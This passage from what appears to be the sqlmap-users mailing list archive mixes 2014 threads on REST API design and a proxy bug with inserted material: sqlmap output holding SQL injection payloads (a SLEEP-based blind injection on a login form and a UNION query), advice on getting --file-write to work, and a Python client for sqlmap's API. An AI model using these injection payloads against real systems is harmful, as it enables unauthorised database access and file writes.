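    Payload: act=auth-login&pag=login&username=admin' AND SLEEP(5) AND 'OHln'='OHln&password=admin
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
"""

# Constructed block (not from the page): a parameter where sqlmap also found
# a UNION query, which is enough for --file-write.
CONSTRUCTED_UNION_BLOCK = """\
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 5555=5555

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-1 UNION ALL SELECT NULL,NULL,CONCAT(0x71,0x62,0x71)-- -
---
"""
```

On the posted block the report is `{"GET:username": False}`, which is exactly why sqlmap refuses. If the login page never reflects a column, sqlmap cannot build a UNION on this parameter, and a PHP application that runs its statement through `mysql_query()` will not execute stacked queries either; re-running with `--technique=U` (and `--union-cols`/`--union-char` to steer the column-count and filler guessing) is the check worth making before giving up on `--file-write` here.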
From: Miroslav S. <mir...@gm...> - 2014-03-20 19:05:33
|
Great reply :)

Bye

On Mar 20, 2014 4:13 PM, "Brandon Perry" <bpe...@gm...> wrote:
> I can't comment on building the API, but I maintain C# bindings to the
> sqlmap REST API and, programmatically, it works really well.
>
> There is no authentication, but I only ever run it on localhost anyway so
> this isn't a big deal to me.
>
> I have tested it under relatively heavy load (one API instance testing
> multiple applications) and it has been performant. I don't recall ever
> saying "Man, I wish this were faster".
>
> JSON is totally the way to go for data requests/responses.
>
> One recommendation I have since I deal with many APIs on a daily basis is
> please don't assume the programmers will be interacting with your API with
> language X. The Metasploit MSGPACK API is a good example of this and is
> very cumbersome to use from a strongly typed language. Arachni falls into a
> similar field relying on Ruby-style marshalling or YAML which I simply
> can't do from, say, C#.
>
> Aside from sqlmap, I also really like the cuckoo-sandbox API.
>
> On Thu, Mar 20, 2014 at 10:00 AM, Andres Riancho <and...@gm...> wrote:
>
>> List,
>>
>> I'm going to abuse the list a little bit, and poke your brains for
>> a while, so be prepared :)
>>
>> The w3af project wants to implement its own REST API to expose the
>> w3afCore and KnowledgeBase objects. The core allows users to configure
>> the plugins and start the scan, and the knowledge base holds the
>> vulnerabilities.
>>
>> You guys implemented a REST API for sqlmap, which has been up and
>> running for a while now.
>>
>> What I wanted to know is:
>> * What's the technology stack you guys used for creating the REST
>> API?
>> * Were you happy with it? Would you use something different if
>> you had the chance?
>> * Have you tested the API under heavy load?
>> * Do you have the concept of sessions and users in the API? Why
>> not?
>> * Any recommendations on API design? (paths, results, hrefs, etc.)
>>
>> Thanks!
>>
>> Regards,
>> --
>> Andrés Riancho
>> Project Leader at w3af - http://w3af.org/
>> Web Application Attack and Audit Framework
>> Twitter: @w3af
>> GPG: 0x93C344F3
>>
>> ------------------------------------------------------------------------------
>> Learn Graph Databases - Download FREE O'Reilly Book
>> "Graph Databases" is the definitive new guide to graph databases and their
>> applications. Written by three acclaimed leaders in the field,
>> this first edition is now available. Download your free book today!
>> http://p.sf.net/sfu/13534_NeoTech
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
|
From: Andres R. <and...@gm...> - 2014-03-20 15:32:25
|
Thanks for your input Brandon, very useful!

On Thu, Mar 20, 2014 at 12:12 PM, Brandon Perry <bpe...@gm...> wrote:
> I can't comment on building the API, but I maintain C# bindings to the
> sqlmap REST API and, programmatically, it works really well.
>
> There is no authentication, but I only ever run it on localhost anyway so
> this isn't a big deal to me.
>
> I have tested it under relatively heavy load (one API instance testing
> multiple applications) and it has been performant. I don't recall ever
> saying "Man, I wish this were faster".
>
> JSON is totally the way to go for data requests/responses.
>
> One recommendation I have since I deal with many APIs on a daily basis is
> please don't assume the programmers will be interacting with your API with
> language X. The Metasploit MSGPACK API is a good example of this and is very
> cumbersome to use from a strongly typed language. Arachni falls into a
> similar field relying on Ruby-style marshalling or YAML which I simply can't
> do from, say, C#.
>
> Aside from sqlmap, I also really like the cuckoo-sandbox API.
>
> On Thu, Mar 20, 2014 at 10:00 AM, Andres Riancho <and...@gm...>
> wrote:
>>
>> List,
>>
>> I'm going to abuse the list a little bit, and poke your brains for
>> a while, so be prepared :)
>>
>> The w3af project wants to implement its own REST API to expose the
>> w3afCore and KnowledgeBase objects. The core allows users to configure
>> the plugins and start the scan, and the knowledge base holds the
>> vulnerabilities.
>>
>> You guys implemented a REST API for sqlmap, which has been up and
>> running for a while now.
>>
>> What I wanted to know is:
>> * What's the technology stack you guys used for creating the REST
>> API?
>> * Were you happy with it? Would you use something different if
>> you had the chance?
>> * Have you tested the API under heavy load?
>> * Do you have the concept of sessions and users in the API? Why
>> not?
>> * Any recommendations on API design? (paths, results, hrefs, etc.)
>>
>> Thanks!
>>
>> Regards,
>> --
>> Andrés Riancho
>> Project Leader at w3af - http://w3af.org/
>> Web Application Attack and Audit Framework
>> Twitter: @w3af
>> GPG: 0x93C344F3
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website

--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
|
From: Brandon P. <bpe...@gm...> - 2014-03-20 15:12:48
|
I can't comment on building the API, but I maintain C# bindings to the sqlmap REST API and, programmatically, it works really well.

There is no authentication, but I only ever run it on localhost anyway so this isn't a big deal to me.

I have tested it under relatively heavy load (one API instance testing multiple applications) and it has been performant. I don't recall ever saying "Man, I wish this were faster".

JSON is totally the way to go for data requests/responses.

One recommendation I have since I deal with many APIs on a daily basis is please don't assume the programmers will be interacting with your API with language X. The Metasploit MSGPACK API is a good example of this and is very cumbersome to use from a strongly typed language. Arachni falls into a similar field relying on Ruby-style marshalling or YAML which I simply can't do from, say, C#.

Aside from sqlmap, I also really like the cuckoo-sandbox API.

On Thu, Mar 20, 2014 at 10:00 AM, Andres Riancho <and...@gm...> wrote:
> List,
>
> I'm going to abuse the list a little bit, and poke your brains for
> a while, so be prepared :)
>
> The w3af project wants to implement its own REST API to expose the
> w3afCore and KnowledgeBase objects. The core allows users to configure
> the plugins and start the scan, and the knowledge base holds the
> vulnerabilities.
>
> You guys implemented a REST API for sqlmap, which has been up and
> running for a while now.
>
> What I wanted to know is:
> * What's the technology stack you guys used for creating the REST
> API?
> * Were you happy with it? Would you use something different if
> you had the chance?
> * Have you tested the API under heavy load?
> * Do you have the concept of sessions and users in the API? Why
> not?
> * Any recommendations on API design? (paths, results, hrefs, etc.)
>
> Thanks!
>
> Regards,
> --
> Andrés Riancho
> Project Leader at w3af - http://w3af.org/
> Web Application Attack and Audit Framework
> Twitter: @w3af
> GPG: 0x93C344F3
>

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
|
From: Andres R. <and...@gm...> - 2014-03-20 15:01:27
|
List,

I'm going to abuse the list a little bit, and poke your brains for a while, so be prepared :)

The w3af project wants to implement its own REST API to expose the w3afCore and KnowledgeBase objects. The core allows users to configure the plugins and start the scan, and the knowledge base holds the vulnerabilities.

You guys implemented a REST API for sqlmap, which has been up and running for a while now.

What I wanted to know is:
* What's the technology stack you guys used for creating the REST API?
* Were you happy with it? Would you use something different if you had the chance?
* Have you tested the API under heavy load?
* Do you have the concept of sessions and users in the API? Why not?
* Any recommendations on API design? (paths, results, hrefs, etc.)

Thanks!

Regards,
--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
|
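An added example for the thread above, covering both Andres's questions about sessions and API design and Brandon's description of driving the API from his C# bindings. It is my code, not code from the thread, from Brandon's bindings or from the sqlmap project. It walks sqlmap's REST-JSON API (sqlmapapi.py) the way a client has to: create a task, start a scan with the options as a JSON body, poll the status until the engine reports `terminated`, fetch the findings and delete the task. The endpoint paths (`/task/new`, `/scan/<taskid>/start`, `/scan/<taskid>/status`, `/scan/<taskid>/data`, `/task/<taskid>/delete`), the default port 8775 and the `success`/`taskid`/`engineid`/`status`/`data` fields are those of sqlmapapi.py as I read it. The loopback-only guard, which turns Brandon's "I only ever run it on localhost" into a default the client enforces because the API has no authentication, and the `FakeSqlmapApi` stand-in that lets the flow run without a server are assumptions of this example; the finding the fake returns is constructed.

```python
import json
import time
import urllib.request
from urllib.parse import urlparse

LOOPBACK_HOSTS = {"127.0.0.1", "localhost", "::1"}


class SqlmapApiClient:
    """Client for sqlmapapi.py's REST-JSON interface (example code, see lead-in).

    The server speaks plain HTTP with no authentication, so by default this
    client refuses anything but a loopback address; allow_remote=True is the
    deliberate override for an instance reached through a tunnel or proxy.
    """

    def __init__(self, base_url="http://127.0.0.1:8775", transport=None, allow_remote=False):
        host = urlparse(base_url).hostname or ""
        if host not in LOOPBACK_HOSTS and not allow_remote:
            raise ValueError(f"refusing unauthenticated sqlmap API on non-loopback host {host!r}")
        self.base_url = base_url.rstrip("/")
        # transport(method, path, body_or_None) -> decoded JSON dict. Swappable
        # so the same flow can be driven by FakeSqlmapApi below without a server.
        self.transport = transport or self._http

    def _http(self, method, path, body):
        data = json.dumps(body).encode() if body is not None else None
        req = urllib.request.Request(self.base_url + path, data=data, method=method,
                                     headers={"Content-Type": "application/json"})
        with urllib.request.urlopen(req, timeout=30) as resp:
            return json.loads(resp.read().decode())

    def _call(self, method, path, body=None):
        reply = self.transport(method, path, body)
        # sqlmapapi.py answers {"success": true, ...}; only an explicit false is
        # treated as failure so builds without the flag still work.
        if reply.get("success", True) is False:
            raise RuntimeError(f"{method} {path} failed: {reply}")
        return reply

    def new_task(self):
        return self._call("GET", "/task/new")["taskid"]

    def start(self, taskid, options):
        return self._call("POST", f"/scan/{taskid}/start", options)["engineid"]

    def status(self, taskid):
        return self._call("GET", f"/scan/{taskid}/status")["status"]

    def data(self, taskid):
        return self._call("GET", f"/scan/{taskid}/data")["data"]

    def delete_task(self, taskid):
        self._call("GET", f"/task/{taskid}/delete")

    def run_scan(self, options, poll_interval=1.0, sleep=time.sleep):
        """Create a task, run one scan to completion and return sqlmap's findings."""
        taskid = self.new_task()
        try:
            self.start(taskid, options)
            while True:
                state = self.status(taskid)
                if state == "terminated":
                    break
                if state == "not running":          # engine died before finishing
                    raise RuntimeError("sqlmap engine exited before reporting a result")
                sleep(poll_interval)
            return self.data(taskid)
        finally:
            self.delete_task(taskid)                # never leave task output behind


class FakeSqlmapApi:
    """Constructed stand-in for sqlmapapi.py so the flow above runs offline:
    same request/response shapes, "running" for a few polls, then "terminated"."""

    def __init__(self, polls_until_done=2):
        self.tasks, self.calls, self.polls_until_done = {}, [], polls_until_done

    def __call__(self, method, path, body):
        self.calls.append((method, path))
        parts = path.strip("/").split("/")
        if parts == ["task", "new"]:
            taskid = f"task{len(self.calls):04d}"
            self.tasks[taskid] = {"options": None, "polls": 0}
            return {"success": True, "taskid": taskid}
        if len(parts) != 3 or parts[1] not in self.tasks:
            return {"success": False, "message": "Invalid task ID"}
        kind, taskid, action = parts
        task = self.tasks[taskid]
        if (kind, action) == ("scan", "start"):
            task["options"] = body
            return {"success": True, "engineid": 4242}
        if (kind, action) == ("scan", "status"):
            task["polls"] += 1
            done = task["polls"] > self.polls_until_done
            return {"success": True, "status": "terminated" if done else "running",
                    "returncode": 0 if done else None}
        if (kind, action) == ("scan", "data"):
            finding = {"type": 0, "value": {"url": task["options"]["url"], "query": None}}
            return {"success": True, "data": [finding], "error": []}
        if (kind, action) == ("task", "delete"):
            del self.tasks[taskid]
            return {"success": True}
        return {"success": False, "message": "Unknown endpoint"}
```

Against a live instance, start the server with `python sqlmapapi.py -s`, build the client without a `transport` argument and call `run_scan({"url": ...})`; it then talks to 127.0.0.1:8775, and pointing it anywhere else needs `allow_remote=True`, which is the moment to put the API behind an SSH tunnel or an authenticating reverse proxy rather than on an open port.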
From: Dirk W. <sp...@dr...> - 2014-03-18 16:23:55
|
On 03/18/2014 04:43 PM, Miroslav Stampar wrote:
> Hi Dirk.
>
> Thank you for your report and find it fixed now [1].

thx, Miroslav. Wow, 39 minutes for the fix! :-)

Cheers, Dirk

> Kind regards,
> Miroslav Stampar
>
> [1] https://github.com/sqlmapproject/sqlmap/issues/644
>
> On Tue, Mar 18, 2014 at 4:04 PM, Dirk Wetter <sp...@dr...> wrote:
>> Hi there,
>>
>> is that only me? The option above doesn't work with 97f603a,
>> it connects to my proxy.
>>
>> Using a previous version does do the trick.
>>
>> Am I missing something?
>>
>> Cheers,
>>
>> Dirk
>
> --
> Miroslav Stampar
> http://about.me/stamparm
|
From: Miroslav S. <mir...@gm...> - 2014-03-18 15:44:00
|
Hi Dirk.

Thank you for your report and find it fixed now [1].

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/issues/644

On Tue, Mar 18, 2014 at 4:04 PM, Dirk Wetter <sp...@dr...> wrote:
> Hi there,
>
> is that only me? The option above doesn't work with 97f603a,
> it connects to my proxy.
>
> Using a previous version does do the trick.
>
> Am I missing something?
>
> Cheers,
>
> Dirk

--
Miroslav Stampar
http://about.me/stamparm
|
From: Dirk W. <sp...@dr...> - 2014-03-18 15:18:47
|
Hi there,

is that only me? The option above doesn't work with 97f603a,
it connects to my proxy.

Using a previous version does do the trick.

Am I missing something?

Cheers,

Dirk
|